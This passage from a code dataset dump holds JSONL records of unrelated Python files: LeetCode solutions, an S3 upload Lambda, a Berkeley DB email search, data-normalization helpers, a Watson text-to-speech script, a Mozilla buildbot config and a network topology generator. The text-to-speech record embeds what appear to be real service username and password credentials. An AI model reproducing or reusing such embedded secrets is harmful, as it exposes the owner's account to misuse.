if cur_1>=len(nums)-1:\n self.result = True\n return\n elif nums[cur_1]==0:\n for i in xrange(cur_2+1,cur_1):\n self.search(nums,nums[i],i)\n return\n","sub_path":"Array/55.Jump Game.py","file_name":"55.Jump Game.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"187906109","text":"import base64\r\nimport json\r\nimport os\r\n\r\nimport boto3\r\n\r\n# Create an S3 client\r\ns3 = boto3.client('s3')\r\nbucket_name = os.environ['S3_BUCKET_DOCUMENTOS']\r\n\r\n\r\ns3 = boto3.client('s3')\r\ndef uploadId(event, context):\r\n if event['method'] == 'POST' :\r\n event = event.get('body')\r\n name = event['name']\r\n correo = event['correo']\r\n correo, dominio = correo.split(\"@\")\r\n correo = correo + \"-\" + dominio\r\n image = event['file']\r\n image = image[image.find(\",\")+1:]\r\n path = correo + \"/\" + name;\r\n dec = base64.b64decode(image + \"===\")\r\n s3.put_object(Bucket=bucket_name, Key=path, Body=dec)\r\n return {'statusCode': 200, 'body': json.dumps({'message': 'successful lambda function call'}), 'headers': {'Access-Control-Allow-Origin': '*'}}\r\n\r\n","sub_path":"Onboarding/src/s3/documentos/uploadIdCard.py","file_name":"uploadIdCard.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610333455","text":"\n\"\"\"this functions get's the raw input from the user and splits it into a list that\ncontains the individual constrains on the output in a proper format \n\nie. if the input is body: stock confidential shares date < 2001/04/12\nthe function will return [body:stock,confidential,shares,date<2001/04/12] \"\"\"\n\nfrom bsddb3 import db\n\ndef main():\n query_input=get_input()\n query_system(query_input,'full')\n pass\n\n\n\ndef get_input():\n \n keywords=[':', '>','<','>=','<=','&']\n query_input=raw_input('Please enter a query using the provided grammar ')\n query_input=query_input.split()\n \n for i in range(0,len(query_input)-1):\n for keyword in keywords:\n if query_input[i][-1] not in keywords and query_input[i+1][0] not in keywords:\n query_input[i]=query_input[i] +'&'\n \n query_input=''.join(query_input)\n query_input=query_input.split('&')\n \n \n return query_input\n \n \n\"\"\" this function makes the actual queries\"\"\" \n \ndef query_system(query_input,output_mode):\n \n queries_results=[]\n \n for query in query_input:\n query=query.split(':')\n \n if query[0] in ['to','cc','bcc','from','to']:\n query_result=email_adress_queries(query)\n query_result=set(query_result)\n\n queries_results.append(query_result)\n \n # if type of query == key_word for query type\n #perform the query for the given operator\n \n #query_result.append(list of rows ids output from the query\n # maybe this can be written as a separate function that directly outputs the list of row ids that needs to be appended\n \n \n \n \n # if type of query == key_word for another query type\n #perform the query for the given operator\n \n #same as above\n \n \n \n #and so on with all the types\n \n #take the intersection of all the list inside the query_results and make a set\n \n rows_id=queries_results[0]\n for query_result in queries_results:\n temp = query_result.intersection(rows_id)\n rows_id=temp\n \n \n \n #print result depending on the output mode\n \n rows_id=list(rows_id)\n if output_mode=='full':\n retrieve_emails(rows_id)\n else:\n print(\"Emails ids\")\n rows_id=list(rows_id)\n rows_id.sort()\n for 
element in rows_id:\n \n print(element)\n \n \n \n #if output mode equal brief\n #return set of the intersection\n \n # if output mode equal full\n \n \n #query again for the full record \n \n \n \ndef email_adress_queries(query):\n\n \n DB_File = \"em.idx\"\n database=db.DB()\n database.open(DB_File,None,db.DB_BTREE)\n curs=database.cursor()\n result=[]\n txt='%s-%s' %(query[0], query[1])\n \n \n value=curs.set(txt.encode(\"utf-8\"))\n if value != None:\n result.append(str(value[1].decode(\"utf-8\")))\n \n dup=curs.next_dup()\n \n while dup!= None:\n result.append(str(dup[1].decode(\"utf-8\")))\n dup=curs.next_dup()\n else:\n result.append(None)\n curs.close()\n database.close()\n \n return result\n \n\"\"\" this following function prints the whole text if the ouput mode is full \"\"\" \n\ndef retrieve_emails(rows_id):\n \n DB_File =\"re.idx\"\n database=db.DB()\n database.open(DB_File,None,db.DB_HASH)\n curs=database.cursor()\n emails=[]\n for element in rows_id:\n emails.append(curs.set(element.encode(\"utf-8\")))\n \n \n for email in emails:\n print(email[1])\n curs.close()\n database.close()\n \n \nmain() \n ","sub_path":"Phase3.py","file_name":"Phase3.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"259688137","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 12 11:17:52 2014\r\n\r\n@author: OCC, ZWY\r\n\r\nThis library is currently a collection of all\r\nnormalization & denormalization methods.\r\nThe methods are grouped together by categories, \r\ni.e. e.g. denormSigmoid is placed right after\r\nnormSigmoid.\r\n\r\nFor ease of specifying a particular method,\r\nnormActiv and denormActiv accepts as arguments data\r\nsphering options and activation function options.\r\n\r\nThis library is expected to be used by SAE and SSAE class.\r\n\"\"\"\r\n\r\nfrom __future__ import division\r\nimport numpy as np\r\nfrom numpy import fmax, fmin, std # normTruncate\r\nfrom numpy import array, mean, multiply, matrix # normLinear\r\n\r\ndef sigmoid(x):\r\n return 1/(1+np.exp(-x))\r\n\r\ndef logit(x):\r\n return np.log(x/(1-x))\r\n \r\ndef tanh(x):\r\n return (1-np.exp(-2*x))/(1+np.exp(-2*x))\r\n \r\ndef tanhInv(x):\r\n return 0.5*np.log((1+x)/(1-x))\r\n\r\ndef softplus(x):\r\n return np.log(1+np.exp(x))\r\n \r\ndef softplusInv(x):\r\n return np.log(np.exp(x)-1)\r\n\r\n\r\ndef normActiv(data,dataStatistics=dict({}),activation='tanh',norm='sphere',by='row'): # by = 'row','col','all' for norm='linear'\r\n activationDict = dict({'sigmoid':sigmoid,'tanh':tanh,'softplus':softplus})\r\n normDict = dict({'linear':normLinear,'sphere':normSphere,'trunc':normTruncate})\r\n activationOpt = activationDict[activation] \r\n normOpt = normDict[norm] \r\n if len(dataStatistics)==0:\r\n data,dataStatistics = normOpt(data,by=by)\r\n data = activationOpt(data)\r\n return data,dataStatistics\r\n else:\r\n data = activationOpt(normOpt(data,dataStatistics=dataStatistics,by=by))\r\n return data \r\n \r\ndef denormActiv(data,dataStatistics,activation='tanh',norm='sphere'):\r\n activationDict = dict({'sigmoid':logit,'tanh':tanhInv,'softplus':softplusInv})\r\n normDict = dict({'linear':denormLinear,'sphere':denormSphere,'trunc':denormTruncate})\r\n activationInvOpt = activationDict[activation] \r\n denormOpt = normDict[norm]\r\n return denormOpt(activationInvOpt(data),dataStatistics) \r\n\r\ndef normTruncate(data,dataStatistics=dict({}),by=None):\r\n truncMean = mean(data,axis=0)\r\n data = data-truncMean\r\n if 
len(dataStatistics)==0:\r\n truncDev = 3*std(data)\r\n else:\r\n truncDev = dataStatistics['truncDev']\r\n data = fmax(fmin(data,truncDev),-truncDev)/truncDev \r\n data = (data+1)*0.4+0.1\r\n if len(dataStatistics)==0:\r\n dataStatistics = dict({'truncMean':truncMean,'truncDev':truncDev})\r\n return data,dataStatistics\r\n else:\r\n return data\r\n\r\ndef denormTruncate(data,dataStatistics): \r\n truncMean = dataStatistics['truncMean']\r\n truncDev = dataStatistics['truncDev'] \r\n return ((data-0.1)/0.4-1)*truncDev+truncMean\r\n\r\n\r\ndef normLinear(data,dataStatistics=dict({}),by='row'):\r\n if len(dataStatistics)==0:\r\n if by == 'row':\r\n dataMean = matrix(mean(data,axis=1)).T\r\n elif by == 'col':\r\n dataMean = mean(data,axis=0)\r\n else:\r\n dataMean = mean(data)\r\n else:\r\n dataMean = dataStatistics['dataMean']\r\n if len(dataStatistics)==0:\r\n if by == 'row':\r\n dataDev = matrix(std(data,axis=1)).T\r\n elif by == 'col':\r\n dataDev = std(data,axis=0)\r\n else:\r\n dataDev = std(data)\r\n else:\r\n dataDev = dataStatistics['dataDev']\r\n data = array((data-dataMean)/(dataDev*3))\r\n if len(dataStatistics)==0:\r\n dataStatistics = dict({'dataMean':dataMean,'dataDev':dataDev})\r\n return data,dataStatistics\r\n else:\r\n return data\r\n \r\ndef denormLinear(data,dataStatistics):\r\n dataMean = dataStatistics['dataMean']\r\n dataDev = dataStatistics['dataDev']\r\n return array(multiply(data,(dataDev*3))+dataMean)\r\n \r\n \r\ndef normSphere(data,dataStatistics=dict({}),by=None):\r\n if len(dataStatistics)==0:\r\n dataRowMean = matrix(mean(data,axis=1)).T\r\n dataRowDev = matrix(std(data-dataRowMean,axis=1))\r\n newdata = array((data-dataRowMean)/(dataRowDev*3))\r\n newdataColMean = mean(newdata,axis=0)\r\n data = array(newdata-newdataColMean)\r\n dataDev = std(data)\r\n dataStatistics = dict({'dataRowMean':dataRowMean,'dataRowDev':dataRowDev,'newdataColMean':newdataColMean,'dataDev':dataDev})\r\n return data*0.17/dataDev,dataStatistics\r\n else:\r\n dataRowMean = dataStatistics['dataRowMean']\r\n dataRowDev = dataStatistics['dataRowDev']\r\n newdataColMean = dataStatistics['newdataColMean']\r\n dataDev = dataStatistics['dataDev']\r\n data = array((data-dataRowMean)/(dataRowDev*3)-newdataColMean)*0.17/dataDev\r\n return data\r\n \r\ndef denormSphere(data,dataStatistics):\r\n dataRowMean = dataStatistics['dataRowMean']\r\n dataRowDev = dataStatistics['dataRowDev']\r\n newdataColMean = dataStatistics['newdataColMean']\r\n dataDev = dataStatistics['dataDev']\r\n return array(multiply(data*dataDev/0.17+newdataColMean,(dataRowDev*3))+dataRowMean)\r\n \r\n \r\n ","sub_path":"codes/normLib.py","file_name":"normLib.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492293053","text":"import pyaudio\nimport wave\nimport time\n\nfrom StringIO import StringIO\nfrom watson_developer_cloud import TextToSpeechV1\nfrom timeout import timeout_decorate, TimeoutError\nfrom pymouse import PyMouse\n\n# define enter/exit methods for use in a context manager\nStringIO.__enter__ = lambda self: self\nStringIO.__exit__ = lambda self, e_type, e_val, tb: self.close()\n\nTextToSpeechV1.synthesize = timeout_decorate(TextToSpeechV1.synthesize, seconds=5)\ntts = TextToSpeechV1(username='68819f91-e8a5-49e3-b284-3b66ed470bb9',\n password='1tkAyaLoSdhm')\nwf = None # the wave file\n\nm = PyMouse()\ndef click():\n \"\"\"Click the mouse to start/stop avatar animation\n \"\"\"\n x, y = map(lambda n: n/2, 
m.screen_size())\n m.click(x, y, 1)\n\nclass SpeechError(Exception):\n pass\n\ndef callback(in_data, frame_count, time_info, status):\n \"\"\"pyaudio callback\n \"\"\"\n data = wf.readframes(frame_count)\n return data, pyaudio.paContinue\n\ndef speak(s):\n \"\"\"Do TTS on a string `s`\n \"\"\"\n global wf\n \n audio = None\n for i in range(3):\n try:\n audio = tts.synthesize(s, accept='audio/wav', voice='en-US_AllisonVoice')\n except TimeoutError:\n print('Timemout %d occured' % i)\n else:\n break\n if not audio:\n raise SpeechError('No response received')\n\n with StringIO(audio) as f:\n wf = wave.open(f, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True,\n stream_callback=callback)\n\n click()\n stream.start_stream()\n while stream.is_active():\n time.sleep(0.1)\n stream.stop_stream()\n stream.close()\n p.terminate()\n click()\n\ndef wrap_text(s, t=None):\n \"\"\"Wrap a string `s` with speak and express-as tags using type `t`\n \"\"\"\n if t:\n return u\"\" % t + \\\n unicode(s) + \\\n u\"\"\n else:\n return u\"\" + unicode(s) + u\"\"\n\ndef englishify(l, conj=True):\n \"\"\"Unpack a list to natural english\n \"\"\"\n if len(l) == 1:\n return l[0]\n elif len(l) == 2:\n return ' and '.join(l) if conj else ' or '.join(l)\n else:\n l_copy = l[:]\n if conj:\n l_copy[-1] = 'and ' + l_copy[-1]\n else:\n l_copy[-1] = 'or ' + l_copy[-1]\n return ', '.join(l_copy)\n\ndef main():\n speak('This is some test text')\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"117512955","text":"MAC_LION_MINIS = ['bld-lion-r5-%03d' % x for x in range(41,81)]\nMAC_SNOW_MINIS = ['moz2-darwin10-slave%02i' % x for x in range(40,57) if x not in (51,52,)] # bug683792\nLINUX_VMS = ['bld-centos5-32-vmw-%03i' % x for x in range(1,23)]\nLINUX_IXS = ['mv-moz2-linux-ix-slave%02i' % x for x in range(2,22)] + \\\n ['linux-ix-slave%02i' % x for x in [1,2,6] + range(12,43)]\nLINUX64_VMS = ['bld-centos5-64-vmw-%03i' % x for x in range(1, 7)]\nLINUX64_IXS = ['linux64-ix-slave%02i' % x for x in range(3,22)]\nWIN32_IXS = ['mw32-ix-slave%02i' % x for x in range(2,16) + [20, 26]]\nWIN64_IXS = ['w64-ix-slave%02i' % x for x in range(6,25) + range(64,85) if x not in [11,20]]\nWIN64_METRO = ['w64-ix-slave%02i' % x for x in [11,20,40,42,43]]\nMOCK_DL120G7 = ['bld-centos6-hp-%03d' % x for x in range(6,24)] # 5 staging, 17 prod, 17 try\nLINUX64_EC2 = ['bld-linux64-ec2-%03d' % x for x in range(1,51)]\n\nSLAVES = {\n 'linux': LINUX_VMS + LINUX_IXS,\n 'linux64': LINUX64_VMS + LINUX64_IXS,\n 'win32': WIN32_IXS,\n 'win64': WIN64_IXS,\n 'win64-metro': WIN64_METRO,\n 'macosx': [],\n 'macosx64': MAC_SNOW_MINIS,\n 'macosx64-lion': MAC_LION_MINIS,\n 'linux-android': LINUX_VMS + LINUX_IXS,\n 'android': LINUX_VMS + LINUX_IXS,\n 'android-xul': LINUX_VMS + LINUX_IXS,\n 'mock': MOCK_DL120G7 + LINUX64_EC2,\n}\n\nTRY_LINUX = ['bld-centos5-32-vmw-%03i' % x for x in range(23,40)]\nTRY_LINUX_IXS = ['mv-moz2-linux-ix-slave%02i' % x for x in range(22,24)] + \\\n ['linux-ix-slave%02i' % x for x in range(7,12)]\nTRY_LINUX64 = ['bld-centos5-64-vmw-%03i' % x for x in range(7, 12)]\nTRY_LINUX64_IXS= ['linux64-ix-slave%02i' % x for x in range(22,42)]\nTRY_LINUX64_EC2= ['try-linux64-ec2-%03d' % x for x in range(1,51)]\nTRY_MAC64 = ['try-mac64-slave%02i' 
% x for x in range(27,32)]\nTRY_WIN32_IXS = ['mw32-ix-slave%02i' % x for x in range(16,19) + range(22,26)]\nTRY_WIN64_IXS = ['w64-ix-slave%02i' % x for x in range(25,64) if x not in [40,42,43]]\nTRY_MOCK_DL120G7 = ['bld-centos6-hp-%03d' % x for x in range(24,43)]\nTRY_LION = ['bld-lion-r5-%03d' % x for x in range(1,41)]\n\nTRY_SLAVES = {\n 'linux': TRY_LINUX + TRY_LINUX_IXS,\n 'linux64': TRY_LINUX64 + TRY_LINUX64_IXS,\n 'win32': TRY_WIN32_IXS,\n 'win64': TRY_WIN64_IXS,\n 'macosx64': TRY_MAC64,\n 'macosx64-lion': TRY_LION,\n 'mock': TRY_MOCK_DL120G7 + TRY_LINUX64_EC2,\n}\n\n# Local overrides for default values\nGLOBAL_VARS = {\n 'config_repo_path': 'build/buildbot-configs',\n 'buildbotcustom_repo_path': 'build/buildbotcustom',\n 'stage_server': 'stage.mozilla.org',\n 'aus2_host': 'aus3-staging.mozilla.org',\n 'aus2_user': 'ffxbld',\n 'aus2_ssh_key': 'auspush',\n 'download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox',\n 'mobile_download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/mobile',\n 'graph_server': 'graphs.mozilla.org',\n 'balrog_api_root': 'https://aus4-admin-dev.allizom.org',\n 'build_tools_repo_path': 'build/tools',\n 'base_clobber_url': 'http://build.mozilla.org/clobberer/index.php',\n 'disable_tinderbox_mail': True,\n # List of talos masters to notify of new builds,\n # and if a failure to notify the talos master should result in a warning,\n # and sendchange retry count before give up\n 'talos_masters': [\n ('buildbot-master36.build.mozilla.org:9301', True, 5),\n ],\n # List of unittest masters to notify of new builds to test,\n # if a failure to notify the master should result in a warning,\n # and sendchange retry count before give up\n 'unittest_masters': [\n ('buildbot-master36.build.mozilla.org:9301', True, 5),\n ],\n 'xulrunner_tinderbox_tree': 'XULRunner',\n 'weekly_tinderbox_tree': 'Testing',\n 'l10n_tinderbox_tree': 'Mozilla-l10n',\n 'base_mirror_urls': ['http://hg-internal.dmz.scl3.mozilla.com'],\n 'base_bundle_urls': ['http://ftp.mozilla.org/pub/mozilla.org/firefox/bundles'],\n 'tooltool_url_list': ['http://runtime-binaries.pvt.build.mozilla.org/tooltool'],\n}\n\nBUILDS_BEFORE_REBOOT = 1\nSYMBOL_SERVER_HOST = 'symbols1.dmz.phx1.mozilla.com'\n\n# Local branch overrides\nBRANCHES = {\n 'mozilla-central': {\n 'packaged_unittest_tinderbox_tree': 'Firefox',\n 'tinderbox_tree': 'Firefox',\n 'mobile_tinderbox_tree': 'Mobile',\n 'mobile_build_failure_emails': [''],\n },\n 'mozilla-release': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Release',\n 'tinderbox_tree': 'Mozilla-Release',\n 'mobile_tinderbox_tree': 'Mozilla-Release',\n },\n 'mozilla-esr10': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Esr10',\n 'tinderbox_tree': 'Mozilla-Esr10',\n 'mobile_tinderbox_tree': 'Mozilla-Esr10',\n },\n 'mozilla-beta': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Beta',\n 'tinderbox_tree': 'Mozilla-Beta',\n 'mobile_tinderbox_tree': 'Mozilla-Beta',\n },\n 'mozilla-aurora': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Aurora',\n 'tinderbox_tree': 'Mozilla-Aurora',\n 'mobile_tinderbox_tree': 'Mozilla-Aurora',\n },\n 'places': {\n 'tinderbox_tree': 'Places',\n 'mobile_tinderbox_tree': 'Places',\n 'packaged_unittest_tinderbox_tree': 'Places',\n },\n 'electrolysis': {\n 'tinderbox_tree': 'Electrolysis',\n 'mobile_tinderbox_tree': 'Electrolysis',\n 'packaged_unittest_tinderbox_tree': 'Electrolysis',\n },\n 'addonsmgr': {\n 'tinderbox_tree': 'AddonsMgr',\n 'mobile_tinderbox_tree': 'AddonsMgr',\n 'packaged_unittest_tinderbox_tree': 'AddonsMgr',\n },\n 
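    # (illustrative editor's note, not part of the original production_config.py
    # sample: the remaining branch entries follow the same tinderbox-tree
    # pattern; only the 'try' branch below additionally overrides download
    # URLs, mail notification, and the win32 build environment)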
'jaegermonkey': {\n 'tinderbox_tree': 'Jaegermonkey',\n 'mobile_tinderbox_tree': 'Jaegermonkey',\n 'packaged_unittest_tinderbox_tree': 'Jaegermonkey',\n },\n 'try': {\n 'tinderbox_tree': 'Try',\n 'mobile_tinderbox_tree': 'Try',\n 'packaged_unittest_tinderbox_tree': 'Try',\n 'download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds',\n 'mobile_download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds',\n 'enable_mail_notifier': True,\n 'notify_real_author': True,\n 'package_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds',\n 'talos_masters': [],\n 'platforms': {\n 'win32': {\n 'env': {\n 'SYMBOL_SERVER_HOST': 'relengweb1.dmz.scl3.mozilla.com',\n 'CVS_RSH': 'ssh',\n 'MOZ_OBJDIR': 'obj-firefox',\n 'TINDERBOX_OUTPUT': '1',\n 'MOZ_CRASHREPORTER_NO_REPORT': '1',\n # Source server support, bug 506702\n 'PDBSTR_PATH': '/c/Program Files/Debugging Tools for Windows (x64)/srcsrv/pdbstr.exe',\n 'HG_SHARE_BASE_DIR': 'e:/builds/hg-shared',\n 'BINSCOPE': 'C:\\Program Files\\Microsoft\\SDL BinScope\\Binscope.exe',\n 'PATH': \"${MOZILLABUILD}buildbotve\\\\scripts;${PATH}\",\n }\n }\n }\n },\n}\n\nPLATFORM_VARS = {}\n\nPROJECTS = {\n 'fuzzing': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'fuzzing_repo': 'ssh://ffxbld@hg.mozilla.org/private/fuzzing',\n 'fuzzing_remote_host': 'ffxbld@pvtbuilds2.dmz.scl3.mozilla.com',\n # Path needs extra leading slash due to optparse expansion on Win32\n 'fuzzing_base_dir': '//mnt/pvt_builds/fuzzing/',\n 'idle_slaves': 3,\n 'disable_tinderbox_mail': False,\n },\n 'nanojit': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'idle_slaves': 3,\n 'tinderbox_tree': 'Nanojit',\n 'disable_tinderbox_mail': False,\n },\n 'spidermonkey_mozilla-inbound': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'idle_slaves': 0,\n 'tinderbox_tree': 'Mozilla-Inbound',\n 'disable_tinderbox_mail': False,\n },\n 'spidermonkey_ionmonkey': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'idle_slaves': 0,\n 'tinderbox_tree': 'Ionmonkey',\n },\n}\n\nif __name__ == \"__main__\":\n import sys, pprint\n args = sys.argv[1:]\n\n # print build slave details\n host_info = {\n 'production': SLAVES,\n 'try': TRY_SLAVES,\n }\n\n if len(args) > 0:\n list_names = args\n else:\n list_names = host_info.keys()\n\n for list_name in list_names:\n for host_platform in host_info[list_name]:\n for host_name in host_info[list_name][host_platform]:\n print(\"%s,%s,%s\" % (list_name, host_platform, host_name))\n\n","sub_path":"mozilla/production_config.py","file_name":"production_config.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"314250812","text":"#!/usr/bin/python3\r\nclass Solution:\r\n def repeatedNTimes(self, A):\r\n count = len(A)/2\r\n for item in A:\r\n if count == A.count(item): return item\r\n \r\n\r\n\r\ndef main():\r\n print(obj.repeatedNTimes([1,2,3,3]))\r\n\r\n# Start program\r\nif __name__ == \"__main__\":\r\n obj = Solution()\r\n main()\r\n ","sub_path":"problem_961_repeated_element/repeated_element.py","file_name":"repeated_element.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"42531633","text":"import wx\nimport OpenGL.GLUT as GLUT\nimport sys\n\nESCAPE = '\\033'\n\ndef keyPressed(*args):\n if args[0] == ESCAPE:\n sys.exit()\n\ndef main():\n x = 0\n while x < 10000:\n print(wx.GetMousePosition())\n 
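        # (illustrative editor's aside, not part of the original mouse.py
        # sample: a tight polling loop like this pegs a CPU core; with
        # "import time" added at the top, a time.sleep(0.05) here would cap
        # polling at roughly 20 Hz — the 50 ms interval is an assumed value)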
x+=1\n\nif __name__ == '__main__':\n app=wx.App(None)\n main()","sub_path":"Graphics Testing/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"163573837","text":"from __future__ import print_function\r\nfrom __future__ import division \r\n\r\nimport unittest\r\n\r\nfrom QV import * \r\n\r\nfrom QV.kind_of_quantity import * \r\nfrom QV.scale import * \r\n\r\n#----------------------------------------------------------------------------\r\nclass TestScale(unittest.TestCase):\r\n\r\n def test(self):\r\n \r\n # construction\r\n Length = KindOfQuantity('Length','L') \r\n \r\n name = 'metre'\r\n symbol = 'm' \r\n \r\n metre = RatioScale(Length,name,symbol)\r\n self.assertTrue( isinstance(metre,RatioScale) )\r\n self.assertTrue( isinstance(metre,Scale) )\r\n self.assertEqual( str(metre), symbol )\r\n self.assertEqual( metre.name, name )\r\n self.assertEqual( metre.kind_of_quantity, Length )\r\n \r\n # Should work as a dict key \r\n d = { metre: 1 }\r\n self.assertTrue( d[metre] == 1 )\r\n\r\n\r\n \r\n#============================================================================\r\nif __name__ == '__main__':\r\n unittest.main()","sub_path":"tests/test_scale.py","file_name":"test_scale.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"121687603","text":"\"\"\"\nThis module is used for optimizing molecular structures and getting ARC file\n \nbased on pybel and MOPAC!\n\nWritten by Dongsheng Cao\n\nDate:2011.3.23\n\"\"\"\n\nimport os\nimport string\n\nfrom pychem import vector3d\n\nVersion = 1.1\n\n\n################################################################################\nclass Atom:\n \"\"\"\n #################################################################\n A atom class used for wrapping some properties of atoms.\n \n Note that Coordinates is the output of the function \n \n (_ReadCoordinates).\n #################################################################\n \"\"\"\n\n def __init__(self, Coordinates):\n\n self.pos = vector3d.Vector3d()\n self.radius = 0.0\n self.Coordinates = Coordinates\n self.Element = ''\n\n def SetCoordinates(self):\n\n temp = self.Coordinates\n self.pos.x = float(temp[1])\n self.pos.y = float(temp[2])\n self.pos.z = float(temp[3])\n\n def GetCoordinates(self):\n\n self.SetCoordinates()\n\n return self.pos\n\n def SetElement(self):\n\n temp = self.Coordinates\n\n self.Element = temp[0]\n\n def GetElement(self):\n\n self.SetElement()\n\n return self.Element\n\n def SetRadius(self):\n\n radii = {'H': 1.20, 'N': 1.55, 'Na': 2.27, 'Cu': 1.40, 'Cl': 1.75, 'C': 1.70,\n 'O': 1.52, 'I': 1.98, 'P': 1.80, 'B': 1.85, 'Br': 1.85, 'S': 1.80, 'Se': 1.90,\n 'F': 1.47, 'Fe': 1.80, 'K': 2.75, 'Mn': 1.73, 'Mg': 1.73, 'Zn': 1.39, 'Hg': 1.8,\n 'Li': 1.8, '.': 1.8}\n\n temp = self.GetElement()\n\n if temp in radii.keys():\n self.radius = radii[temp]\n else:\n self.radius = radii['.']\n\n def GetRadius(self):\n\n self.SetRadius()\n\n return self.radius\n\n\n###########################################################################\n\ndef GetAtomClassList(Coordinates):\n \"\"\"\n #################################################################\n Combine all atoms in a molecule into a list form.\n \n Note that Coordinates is the output of the function (_ReadCoordinates).\n #################################################################\n \"\"\"\n Atoms = []\n 
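    # (illustrative sketch, not from the original GeoOpt.py sample: each
    # Coordinates row is [element, x, y, z, charge], so a single row can be
    # wrapped and queried like this:
    #   atom = Atom(['C', '0.0', '1.5', '-0.3', '0.1'])
    #   atom.GetCoordinates()  # -> vector3d.Vector3d with float x/y/z
    #   atom.GetRadius()       # -> 1.70 for carbon; 1.8 fallback for unknown)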
for i in Coordinates:\n atom = Atom(i)\n atom.SetCoordinates()\n atom.SetElement()\n atom.SetRadius()\n Atoms.append(atom)\n return Atoms\n\n\n########################################################################### \n\ndef _ReadCoordinates(filename=\"temp\"):\n \"\"\"\n #################################################################\n Read the coordinates and charge of each atom in molecule from .arc file.\n #################################################################\n \"\"\"\n res = []\n\n f = open(filename, 'r')\n templine = f.readlines()\n f.close()\n\n for line in range(len(templine)):\n if templine[line][-7:-1] == \"CHARGE\":\n k = line\n break\n\n for i in templine[k + 4:len(templine) - 1]:\n temp = i.split()\n ElementCoordinate = [string.strip(temp[0]), string.strip(temp[1]),\n string.strip(temp[3]), string.strip(temp[5]),\n string.strip(temp[10])]\n res.append(ElementCoordinate)\n\n return res\n\n\n#############################################################################\n\n\ndef RunMOPAC(filename):\n \"\"\"\n #################################################################\n Run the MOPAC using os.system\n #################################################################\n \"\"\"\n\n itest = os.system(\"run_mopac7\" + \" \" + filename)\n # time.sleep(1)\n return itest\n","sub_path":"pychem/GeoOpt.py","file_name":"GeoOpt.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"617647467","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\nimport json\nfrom pathlib import Path\nfrom counteriter import CounterIterator\nfrom toporender import main as renderer\n\nSPEED = 1\nHPC = 4\n\nCELLS = HPC+1\n\nhosts_iter = CounterIterator()\nswitch_iter = CounterIterator()\n\n\ndef reset_iters():\n global hosts_iter\n global switch_iter\n hosts_iter = CounterIterator()\n switch_iter = CounterIterator()\n\n\ndef circular_rshift(sbs, i):\n ai = i % len(sbs)\n return sbs[ai:]+sbs[:ai]\n\n\ndef filter_not(func, iterable):\n return filter(lambda a: not func(a), iterable)\n\n\ndef sew_rows(r1, r2, bw=None):\n return [(i, j, bw) for i in r1 for j in r2]\n\n\ndef create_cell():\n this_hosts = []\n this_switches = []\n this_links = []\n sw = f's{next(switch_iter)}'\n hosts = [f'h{next(hosts_iter)}' for _ in range(HPC)]\n this_hosts += hosts\n this_switches += [sw]\n this_links += sew_rows([sw], hosts, SPEED)\n return this_hosts, this_switches, this_links\n\n\ndef create_topo():\n this_hosts = []\n this_switches = []\n this_links = []\n stategic = []\n for _ in range(CELLS):\n h, s, l = create_cell()\n this_hosts += h\n this_switches += s\n this_links += l\n stategic.append(h[-HPC:])\n processed = list()\n for i, cell in enumerate(stategic):\n cells_taken_by_this_cell = []\n while not all(map(processed.__contains__, cell)):\n h1, *_ = filter_not(processed.__contains__, cell)\n for j, cell2 in enumerate(stategic):\n if i >= j:\n continue\n if j in cells_taken_by_this_cell:\n continue\n h2, *_ = filter_not(processed.__contains__, cell2)\n this_links.append((h1, h2, SPEED))\n processed += [h1, h2]\n cells_taken_by_this_cell.append(j)\n break\n return this_hosts, this_switches, this_links\n\n\ndef main(fn: str = 'dcell'):\n reset_iters()\n topo = create_topo()\n reset_iters()\n Path(f'{fn}.json').write_text(json.dumps(topo))\n renderer(fn)\n\n\nif __name__ == '__main__':\n 
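    # illustrative sanity check (editor's addition, not in the original
    # topocreatedcell.py sample): sew_rows() emits the full bipartite link
    # set between two node rows, which is how each cell switch is wired
    assert sew_rows(['s0'], ['h0', 'h1'], 1) == [('s0', 'h0', 1), ('s0', 'h1', 1)]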
